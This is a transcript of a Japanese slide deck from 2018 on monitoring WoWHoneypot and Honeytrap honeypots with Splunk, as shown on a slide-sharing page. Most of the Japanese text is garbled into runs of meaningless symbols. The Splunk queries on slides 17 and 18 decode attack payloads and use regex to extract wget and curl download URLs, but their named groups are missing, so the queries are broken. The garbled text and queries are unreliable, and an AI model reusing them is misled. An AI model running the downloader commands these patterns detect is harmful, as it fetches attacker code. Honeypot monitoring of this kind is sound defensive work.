Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Splunkによるハニーポット監視.pdf

sec-chick
September 30, 2018
1.3k

 Splunkによるハニーポット監視.pdf

sec-chick

September 30, 2018
Tweet

Transcript

  1. 5
    SPLUNK

    SEC-CHICK

    View Slide

  2. WHO AM I

    sec-chick@one_sec_chick
    (('/+#!/)

    )/ ,-$
    PSOC&-%
    • 2
    ('/+#% (WoW Honeypot, Honeytrap)

    0".*/1

    View Slide


  3. View Slide



  4. Splunk
    ( )
    WoWHoneypot
    Honeytrap
    PC

    VPS
    SSH
    • Splunk

    View Slide

  5. SPLUNK
    • Splunk<(159$= 16%;'49&;/
    .+-8;$,;*!9,+$()0-"#
    • IT!905!29-6 7*!3

    :
    >
    http://www.intellilink.co.jp/pd/products/package/security/splunk.html

    View Slide




  6. • WoWHoneypot

    View Slide




  7. • Honeytrap

    View Slide


  8. 8 9
    1. SSH)71!&+*57%45' ,#6570
    2. Splunk)71,#65705'
    3. Splunk5' )7-
    4. 37/
    5. 2"570 .(70
    82"570HEX$6(709

    View Slide


  9. Attack_connection.local_port


    10

    View Slide


  10. Attack_connection.payload.data_hex


    Hex



    View Slide




  11. View Slide


  12. 1.
    Docker
    2.

    3. Splunk

    4. Suricata

    View Slide

  13. /.10,-%DOCKER
    • /.10,-&$ $!"'* (#)
    +
    $* (Docker+
    • $ Docker+→% $

    View Slide

  14. %"-+(

    • .#Docker %"-+(

    • %"-+(cron$,*
    Splunk
    WoWHoneypot
    Honeytrap
    !/&0)'( VPS
    Honeypot.#
    Docker

    View Slide


  15. Splunk
    WoWHoneypot
    Honeytrap
    VPS
    Honeypot

    Docker

    View Slide

  16. SPLUNK+;N?
    • 0 '!0.*Splunk+;N?1
    • @:NB+2EJ9N• G4MA,+/
    - "$F4LNB1@:NB"$
    'D3NKB("&
    → Grep '!0
    *)0
    - C=/87J1D3NKB("&
    → 0 C='#-! 1
    - HK562+>5MLNB1%$URL1D3NKB("&
    → HK562+>5MLNB1VirusTotal'

    View Slide

  17. WOWHONEYPOT
    |rex field=_raw
    "¥"(?[^¥s]+)¥s(?[^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s(?
    .*$)"
    | decrypt field="base64_wow" atob emit('base64_wow_decrypted’)
    |eval decode=urldecode(base64_wow_decrypted)
    | rex field="decode" "wget.+(?https?://[¥w/:¥.¥-]+?)¥s"|
    rex field="decode" "curl.+(?https?://[¥w/:¥.¥-]+?)¥s"

    View Slide

  18. HONEYTRAP
    | decrypt field="attack_connection.payload.data_hex" unhex
    emit('attack_connection.payload.data_decrypted')
    | rex field="attack_connection.payload.data_decrypted"
    "wget.+(?https?://[¥w/:¥.¥-]+?)¥s"
    | rex field="attack_connection.payload.data_decrypted"
    "curl.+(?https?://[¥w/:¥.¥-]+?)¥s" |

    View Slide

  19. HONEYTRAP

    View Slide

  20. SURICATA4
    • Grep05%72#
    9),#1#
    • ;=:><05"68+* 525
    /#2#
    → ./
    • Suricata3)#),7 !1$/'-(#??

    View Slide


  21. "!-,1.)(1
    • @Sec_S_Owl #
    • @cactus_pots #
    • @SugitaMuchi #
    • @soji256
    • @morihi_soc #
    -,1.)+
    !Twitter-)'0(% #-,1.)+

    Slack!&/0,*$ ! 2
    http://goo.gl/8bLkZA

    View Slide

  22. #

    View Slide

  23. /)0
    • Splunk(,A@CB>?,
    +&'
    • (5)"6-*5. $2%4+;C= 7$
    +7!54+%5")
    • #81A@CB>?7$'7<:9$'/$3DD

    View Slide